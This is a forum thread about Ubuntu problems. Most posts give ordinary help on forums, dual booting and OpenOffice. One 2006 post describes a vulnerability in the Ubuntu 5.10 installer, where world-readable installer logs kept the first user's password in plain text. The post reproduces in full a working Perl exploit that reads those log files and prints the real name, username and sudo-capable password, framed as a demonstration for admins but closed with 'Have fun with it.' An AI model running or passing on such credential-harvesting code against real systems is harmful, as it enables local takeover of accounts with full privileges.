Welcome Guest ( Log In | Register )

Outline · [ Standard ] · Linear+

 [Help!] Ubuntu Problems, everything related to ubuntu goes here

views
     
debiankl
post May 24 2005, 11:20 AM

On my way
Group Icon
Elite
577 posts

Joined: Dec 2004
From: Inside the CPU core stack register SP


In Ubuntu Forum, that where lots of problems of Ubuntu were being posted and responded by Ubuntu community and developers.

IMHO posting Ubuntu problem in this forum, u may not get effective results as posting ur problem to Ubuntu's forum.

Beside Ubuntu's forum, there is Ubuntu's Wiki which enrich with important information contibuted by Ubuntu community and developers.

This post has been edited by debiankl: May 24 2005, 11:20 AM
debiankl
post Mar 24 2006, 05:10 PM

On my way
Group Icon
Elite
577 posts

Joined: Dec 2004
From: Inside the CPU core stack register SP


On 12th March Ubuntu 510 has security vulnerablity, that Ubuntu 5.10
failed to clean passwords in the installer log files. Since these files were
world-readable, any local user could see the password of the first
user account, which has full sudo privileges by default.

If you have NOT update the security of Ubuntu 5.10, (not using 2.67ubuntu20 (base-config) and 1:4.0.3-37ubuntu8 (passwd) program then used the follow exploit code to demonstrate this security vulnerability. This program will results of showing the userid and password. I hope will this will change your sys admin mind to update Ubuntu5.10

#!/usr/bin/perl -w

use warnings;
use strict;

##############################################################################
# Author: Kristian Hermansen
# Date: 3/12/2006
# Overview: Ubuntu Breezy stores the installation password in plain text
# Link: https://launchpad.net/distros/ubuntu/+sourc...adow/+bug/34606
##############################################################################

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n";
print "99% effective, thank your local admin ;-)\n";
print "FOR EDUCATIONAL PURPOSES ONLY!!!\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";

# the two vulnerable files
my $file1 = "/var/log/installer/cdebconf/questions.dat";
my $file2 = "/var/log/debian-installer/cdebconf/questions.dat";

print "Checking if an exploitable file exists...";
if ( (-e $file1) || (-e $file2) )
{
print "Yes\nNow checking if readable...";
if ( -r $file1 )
{
getinfo($file1);
}
else
{
if ( -r $file2 ) {
getinfo($file2);
}
else {
print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n";
exit(-2);
}
}
}
else
{
print "No\nFile may have been deleted by the administrator :-(\nExiting...\n";
exit(-1);
}

sub getinfo {
my $fn = shift;
print "Yes\nHere come the details...\n\n";
my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`;
my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`;
my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`;
chomp($realname);
chomp($user);
chomp($pass);
print "Real Name: $realname\n";
print "Username: $user\n";
print "Password: $pass\n";
}

Have fun with it. rclxlh.gif
debiankl
post Aug 25 2006, 11:09 PM

On my way
Group Icon
Elite
577 posts

Joined: Dec 2004
From: Inside the CPU core stack register SP


QUOTE(xboss182 @ Aug 25 2006, 05:10 PM)
hi there..
my ppl got free cd from France last week. he just insert da add at website and after dat he got bout 5 free cd. he ask me to look at it..
but for me, i knoe nothing bout linux..

so,wanna know dat
1. can install both linux and windows in same pc??
2. hows da installation,jus like windows or what??
3. about da document,does its support microsoft word??

sorry for da stupid question but i still newbie in tech world..
hoping da helps for all of u.. thumbup.gif
*
1. Yes, but for newbie I would not recommend it require because resize existing XP partition (presumed HDD has been preinstalled with XP by manufacturer) for Linux OS plus file backup before resize partition. Otherwise, use vmware workstation (if u have it) on XP then you can run Ubuntu as guest OS on vmware without having to peformed the above resize partitions but you need min 256MB or more memory.

2. Ubuntu installer is GUI based so as Windows too.

3. Plenty of documentation on the Ubuntu website and Ubuntu community web site. It comes with OpenOffice Suite 2.0.x which can read/write MS Word documents file format and export document as PDF file without using Adobe PDF.

 

Change to:
| Lo-Fi Version
0.0266sec    0.76    7 queries    GZIP Disabled
Time is now: 16th December 2025 - 03:21 PM